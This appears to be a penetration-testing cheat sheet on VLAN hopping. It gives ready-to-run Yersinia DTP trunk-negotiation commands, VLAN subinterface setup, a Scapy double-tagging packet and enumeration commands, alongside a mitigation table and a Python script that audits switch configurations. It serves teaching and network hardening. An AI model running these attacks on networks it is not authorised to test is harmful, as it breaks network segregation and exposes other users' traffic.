Overview

VLAN hopping allows an attacker to access traffic on other VLANs without routing. The two main techniques are switch spoofing (DTP) and double tagging.

Switch Spoofing (DTP Abuse)

Negotiate a trunk port with the switch via DTP.

Yersinia

yersinia dtp -attack 1 -interface eth0

Manual with Scapy

from scapy.all import *
from scapy.contrib.dtp import *

negotiate_trunk(iface="eth0")

After Trunk Established

# Create VLAN interface
modprobe 8021q
vconfig add eth0 TARGET_VLAN
ifconfig eth0.TARGET_VLAN up
dhclient eth0.TARGET_VLAN

Or manually:

ip link add link eth0 name eth0.100 type vlan id 100
ip addr add 10.10.100.10/24 dev eth0.100
ip link set eth0.100 up

Hosts on VLAN 100 are now reachable.

Double Tagging

Encapsulate the frame in two 802.1Q tags. The outer tag matches the native VLAN; the inner tag is the target VLAN.
One-way only: no return traffic. Useful for blind attacks (e.g., injecting into the target VLAN).

Scapy

from scapy.all import *

packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="TARGET")/ICMP()
sendp(packet, iface="eth0")

Requirements

  • Attacker on native VLAN (untagged)
  • Switch doesn’t strip outer tag before forwarding
  • Target VLAN known

VLAN Enumeration

Wireshark

vlan

Look for 802.1Q tagged frames to identify VLANs.

Nmap

nmap --script=broadcast-listener -e eth0

CDP/LLDP

tcpdump -i eth0 -nn -v 'ether proto 0x88cc'   # LLDP
yersinia cdp -attack 0 -interface eth0          # CDP sniff

Mitigation

| Defense | Description |
| --- | --- |
| Disable DTP | switchport nonegotiate |
| Access mode | switchport mode access on all ports |
| Native VLAN | Change from VLAN 1 to unused VLAN |
| VLAN pruning | Only allow needed VLANs on trunks |
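
The four defenses above can be checked mechanically against a switch configuration. The following is an added example, not part of the original page: it audits a Cisco IOS-style config for ports that miss them. The sample config, the audit() function and the finding strings are constructed for illustration, and the checks assume IOS defaults (native VLAN 1 and all VLANs allowed on a trunk when nothing is configured).

```python
import re

# Constructed IOS-style sample config for illustration (not from a real device).
SAMPLE_CONFIG = """\
interface GigabitEthernet0/1
 switchport mode access
 switchport nonegotiate
!
interface GigabitEthernet0/2
 switchport access vlan 20
!
interface GigabitEthernet0/3
 switchport mode trunk
 switchport nonegotiate
!
interface GigabitEthernet0/4
 switchport mode trunk
 switchport trunk native vlan 999
 switchport trunk allowed vlan 10,20
 switchport nonegotiate
"""

STANZA = re.compile(r"^interface (\S+)[ \t]*\n((?:[ \t]+.*\n?)*)", re.M)  # header + indented lines

def audit(config):
    """Return {interface: [failed checks]} for the four defenses in the table."""
    findings = {}
    for name, body in STANZA.findall(config):
        cmds = [line.strip() for line in body.splitlines()]
        mode = next((c.split()[2] for c in cmds if c.startswith("switchport mode ")), None)
        issues = []
        if mode not in ("access", "trunk"):
            issues.append("no static mode")  # mode unset or dynamic
        if "switchport nonegotiate" not in cmds:
            issues.append("DTP not disabled")
        if mode == "trunk":
            native = [c.split()[-1] for c in cmds if c.startswith("switchport trunk native vlan ")]
            if not native or native[-1] == "1":  # assumption: unset means VLAN 1
                issues.append("native VLAN is 1")
            allowed = [c.split()[-1] for c in cmds if c.startswith("switchport trunk allowed vlan ")]
            if not allowed or allowed[-1] == "all":  # assumption: unset means all VLANs
                issues.append("trunk not pruned")
        if issues:
            findings[name] = issues
    return findings

if __name__ == "__main__":
    for port, issues in audit(SAMPLE_CONFIG).items():
        print(f"{port}: {', '.join(issues)}")
```
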

Quick Reference

| Attack | Method |
| --- | --- |
| DTP abuse | yersinia dtp -attack 1 → negotiate trunk |
| Access VLAN | vconfig add eth0 VLAN_ID after trunk |
| Double tag | Scapy: Dot1Q(native)/Dot1Q(target), one-way only |
| Enumerate | Wireshark vlan filter, CDP/LLDP sniff |